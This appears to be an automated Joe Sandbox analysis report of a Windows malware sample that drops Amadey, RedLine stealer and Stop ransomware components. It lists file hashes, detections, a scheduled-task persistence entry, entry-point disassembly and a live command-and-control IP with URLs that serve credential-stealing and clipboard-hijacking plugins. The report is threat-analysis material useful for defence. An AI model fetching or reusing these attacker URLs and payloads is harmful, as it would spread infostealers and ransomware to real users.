                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll81%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe81%ReversingLabsWin32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe54%ReversingLabsWin32.Trojan.Tedy
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe81%ReversingLabsWin32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe47%ReversingLabsWin32.Ransomware.Stop
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe82%ReversingLabsByteCode-MSIL.Trojan.Disabler
                          C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll81%ReversingLabsWin32.Trojan.Amadey
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://62.204.41.4/Gol478Ns/Plugins/cred64.dll0%Avira URL Cloudsafe
                          62.204.41.4/Gol478Ns/index.php12%VirustotalBrowse
                          http://62.204.41.4/Gol478Ns/Plugins/cred64.dll2%VirustotalBrowse
                          http://62.204.41.4/Gol478Ns/Plugins/clip64.dll17%VirustotalBrowse
                          http://62.204.41.4/Gol478Ns/Plugins/clip64.dll100%Avira URL Cloudmalware
                          http://62.204.41.4/Gol478Ns/index.php100%Avira URL Cloudmalware
                          62.204.41.4/Gol478Ns/index.php100%Avira URL Cloudmalware
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          http://62.204.41.4/Gol478Ns/Plugins/cred64.dlltrue
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://62.204.41.4/Gol478Ns/Plugins/clip64.dlltrue
                          • 17%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          unknown
                          62.204.41.4/Gol478Ns/index.phptrue
                          • 12%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          low
                          http://62.204.41.4/Gol478Ns/index.phptrue
                          • Avira URL Cloud: malware
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          62.204.41.4
                          unknownUnited Kingdom
                          30798TNNET-ASTNNetOyMainnetworkFItrue
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:800799
                          Start date and time:2023-02-07 19:59:16 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 13m 50s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:32
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample file name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@38/14@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 46.9% (good quality ratio 44.9%)
                          • Quality average: 84.9%
                          • Quality standard deviation: 24.2%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 96
                          • Number of non-executed functions: 139
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240s for rundll32
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          TimeTypeDescription
                          20:00:47API Interceptor2477x Sleep call for process: mnolyk.exe modified
                          20:00:50Task SchedulerRun new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          62.204.41.4file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          TNNET-ASTNNetOyMainnetworkFIfile.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.134
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          Rg7BWLbTVs.exeGet hashmaliciousBrowse
                          • 62.204.41.134
                          y7bGEK2e4Y.exeGet hashmaliciousBrowse
                          • 62.204.41.5
                          MZtij6SN87.exeGet hashmaliciousBrowse
                          • 62.204.41.5
                          9sJ5F2RAvY.exeGet hashmaliciousBrowse
                          • 62.204.41.5
                          xakJ7het39.exeGet hashmaliciousBrowse
                          • 62.204.41.134
                          ePaQLI5RyP.exeGet hashmaliciousBrowse
                          • 62.204.41.7
                          z3tYlqYItl.exeGet hashmaliciousBrowse
                          • 62.204.41.7
                          jGQGty5EA2.exeGet hashmaliciousBrowse
                          • 62.204.41.7
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          No context
                          No context
                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          File Type:CSV text
                          Category:dropped
                          Size (bytes):226
                          Entropy (8bit):5.354940450065058
                          Encrypted:false
                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                          MD5:B10E37251C5B495643F331DB2EEC3394
                          SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                          SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                          SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                          Malicious:false
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):321
                          Entropy (8bit):5.355221377978991
                          Encrypted:false
                          SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                          MD5:03C5BA5FCE7124B503EA65EF522177C3
                          SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                          SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                          SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                          Malicious:false
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                          Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):91136
                          Entropy (8bit):6.3469756750979025
                          Encrypted:false
                          SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                          MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                          SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                          SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                          SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll, Author: Joe Security
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 81%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):241664
                          Entropy (8bit):6.368190069123744
                          Encrypted:false
                          SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                          MD5:8BB923C4D81284DAEF7896E5682DF6C6
                          SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                          SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                          SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 81%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):346112
                          Entropy (8bit):7.640932751534781
                          Encrypted:false
                          SSDEEP:6144:K2y+bnr+Sp0yN90QEhNngiBIdDYf6EeYHPmSNjzAwtRS:KMriy90VRBIdhYzVtY
                          MD5:DAE3685D13248C42313D46F76E2EC968
                          SHA1:3547935A2D717DBFA69E9718F62A68ADDF58FFC8
                          SHA-256:13A8DA35A2F966FAC5A6A327FA92A963EA287878E63C5416BA4F49BF80EE4D8B
                          SHA-512:D77969AD3D60707C6870A0E14DC7DB9D7CB2624BBBC7448BF137E04B13232C28B1C796266CB8466D1F5C3FA720A006C884C13937E72C566A5074966E2AC0E566
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 54%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ......................................@...............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):241664
                          Entropy (8bit):6.368190069123744
                          Encrypted:false
                          SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                          MD5:8BB923C4D81284DAEF7896E5682DF6C6
                          SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                          SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                          SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 81%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):251392
                          Entropy (8bit):7.321238876486759
                          Encrypted:false
                          SSDEEP:3072:SJsOlmNl8dK08LQXi3Wh59aFBIaYLDgoA702gTutxYfTPJgWoVbXTbw3Ga44:SJs/ud/8Lf3jBITDYMStefrJgr9b64
                          MD5:6E870598039CCE621C7BB265AC99BB3F
                          SHA1:708EACDFEC2DED675D36C1EB3EA628797A366E10
                          SHA-256:70C16C54B87BF8D2F57B36C26064E8E03D6F80CEB82254E556BE847A15CAEA95
                          SHA-512:6200818C2CA60B10F14DAD31A55D4A89F51E0682F7459764608FD96E57663247F0DAACF8C773501077AD47D5BADD12E6829E5CFD65593366011BD1B4326117A4
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 47%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L....).a............................or............@.........................................................................l...P....p..............................@...............................p9..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):11264
                          Entropy (8bit):4.97029807367379
                          Encrypted:false
                          SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                          MD5:7E93BACBBC33E6652E147E7FE07572A0
                          SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                          SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                          SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 82%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                          Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):91136
                          Entropy (8bit):6.3469756750979025
                          Encrypted:false
                          SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                          MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                          SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                          SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                          SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 81%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):162
                          Entropy (8bit):4.621829903792328
                          Encrypted:false
                          SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                          MD5:1B7C22A214949975556626D7217E9A39
                          SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                          SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                          SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                          Malicious:false
                          Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                          Process:C:\Windows\SysWOW64\cacls.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):15
                          Entropy (8bit):3.240223928941852
                          Encrypted:false
                          SSDEEP:3:o3F:o1
                          MD5:509B054634B6DE74F111C3E646BC80FD
                          SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                          SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                          SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                          Malicious:false
                          Preview:processed dir:
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.8099344672941
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:537088
                          MD5:16755b75334b8655bc2357553a9fdab4
                          SHA1:5705cf96e5337cd165fce107d5d11c020a69fe4f
                          SHA256:e2b454a6a774a94abfde2acec235fde33da717943ab9e2c5c51b8428df0f9253
                          SHA512:4dd98cecf0c988ca46aab7f9544ebc326653802e65014add232c7d926194eb07c7f7ace11e1ae85c36873845680df803cffb4878371e8ba185a44a81f588b348
                          SSDEEP:6144:Kky+bnr+Pp0yN90QEDJ1o6Su5TojNCee1utRhD8r8yDdTIfDYt6EeYwPmSNVzAwE:0MrPy9066SuO/pyhTIb7Y4VtukFu
                          TLSH:3DB40207D6EC8022D4F557B019F343C3063B7EA15B7893AB224D9C5A1D73AA4A6713BB
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                          Icon Hash:f8e0e4e8ecccc870
                          Entrypoint:0x406a60
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:10
                          OS Version Minor:0
                          File Version Major:10
                          File Version Minor:0
                          Subsystem Version Major:10
                          Subsystem Version Minor:0
                          Import Hash:646167cce332c1c252cdcb1839e0cf48
                          Instruction
                          call 00007FEDA4ACE4A5h
                          jmp 00007FEDA4ACDDB5h
                          push 00000058h
                          push 004072B8h
                          call 00007FEDA4ACE547h
                          xor ebx, ebx
                          mov dword ptr [ebp-20h], ebx
                          lea eax, dword ptr [ebp-68h]
                          push eax
                          call dword ptr [0040A184h]
                          mov dword ptr [ebp-04h], ebx
                          mov eax, dword ptr fs:[00000018h]
                          mov esi, dword ptr [eax+04h]
                          mov edi, ebx
                          mov edx, 004088ACh
                          mov ecx, esi
                          xor eax, eax
                          lock cmpxchg dword ptr [edx], ecx
                          test eax, eax
                          je 00007FEDA4ACDDCAh
                          cmp eax, esi
                          jne 00007FEDA4ACDDB9h
                          xor esi, esi
                          inc esi
                          mov edi, esi
                          jmp 00007FEDA4ACDDC2h
                          push 000003E8h
                          call dword ptr [0040A188h]
                          jmp 00007FEDA4ACDD89h
                          xor esi, esi
                          inc esi
                          cmp dword ptr [004088B0h], esi
                          jne 00007FEDA4ACDDBCh
                          push 0000001Fh
                          call 00007FEDA4ACE2DBh
                          pop ecx
                          jmp 00007FEDA4ACDDECh
                          cmp dword ptr [004088B0h], ebx
                          jne 00007FEDA4ACDDDEh
                          mov dword ptr [004088B0h], esi
                          push 004010C4h
                          push 004010B8h
                          call 00007FEDA4ACDF06h
                          pop ecx
                          pop ecx
                          test eax, eax
                          je 00007FEDA4ACDDC9h
                          mov dword ptr [ebp-04h], FFFFFFFEh
                          mov eax, 000000FFh
                          jmp 00007FEDA4ACDEE9h
                          mov dword ptr [004081E4h], esi
                          cmp dword ptr [004088B0h], esi
                          jne 00007FEDA4ACDDCDh
                          push 004010B4h
                          push 004010ACh
                          call 00007FEDA4ACE495h
                          pop ecx
                          pop ecx
                          mov dword ptr [000088B0h], 00000000h
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x7aae4.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x870000x888.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0xc0000x7b0000x7ac00False0.9243293342668024data7.854654116031079IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x870000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountry
                          AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                          RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                          RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                          RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                          RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                          RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                          RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                          RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                          RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                          RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                          RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
